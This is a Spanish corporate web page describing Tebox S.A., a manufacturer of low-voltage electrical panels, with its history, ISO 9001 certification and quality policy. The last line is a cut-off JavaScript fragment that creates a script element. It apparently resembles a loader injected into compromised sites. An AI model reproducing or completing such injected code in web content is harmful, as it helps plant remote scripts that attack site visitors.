Montajes Electromecánicos TEBOX, S.A.

Previous
Next

Empresa

 

Montajes Electromecánicos Tebox S.A. se funda en 1979 para cubrir gran parte de las necesidades de suministro a los instaladores electricistas, tales como equipos de medida, centralización de contadores en viviendas y cuadros de distribución y control. Comercialización de elementos normalizados en la mayoría de casos, aunque también montajes específicos siguiendo las especificaciones del cliente.

En todo momento la empresa ha exigido la máxima calidad en los materiales y en los productos finales, para lograr la satisfacción y confianza de sus clientes. Para ello implantó un sistema de calidad en el año 1996, actualmente adaptado a la norma ISO 9001/2008, con la certificadora Bureau Veritas Certificación (NC7002662).

Para conseguir el prestigio y la seriedad con los que cuenta Tebox, los productos que comercializa se adaptan a las exigencias de las compañías suministradoras de energía eléctrica, a las normas UNE vigentes en España, a las normas EN Europeas, como también al REBT.

Política de la calidad:

Tebox S.A. dedica su actividad al diseño, producción y comercialización de cuadros eléctricos de baja tensión, para medida, distribución de la energía y control.

La Gerencia de la empresa Tebox S.A. considera y declara como objetivos estratégicos de su gestión los siguientes:
• Conseguir la plena satisfacción del cliente mediante el estricto cumplimiento de los requerimientos contratados.
• Mantener un alto nivel de innovación en la fabricación de sus productos en el marco de un sistema permanente de mejora continua.
• Cumplir puntualmente la normativa legal aplicable a todas las actividades de la empresa, implicadas en el Sistema de calidad.
• Conseguir la máxima motivación sobre la Calidad en todos sus colaboradores.

Para alcanzar estos objetivos, es política de la Dirección de Tebox S.A. liderar e impulsar la ejecución de las siguientes acciones:
• Establecer y mantener un Sistema de Calidad efectivo y eficaz, planeado y desarrollado en conjunto con el resto de funciones de la Dirección.
• En el marco de dicho Sistema, la determinación de la conformidad del trabajo a los requerimientos contractuales y normativos estará siempre apoyada en resultados y evidencias objetivas.
• Asegurar que ella misma, el personal técnico y el subalterno, estén totalmente familiarizados con los Objetivos y la Política de calidad la Empresa a través de un programa de preparación y formación del personal a todos los niveles de la misma.

El Sistema de Calidad de Tebox S.A. está basado en los requerimientos de la norma UNE-EN-ISO 9001:2008.

var d=document;var s=d.createElement(‘script’);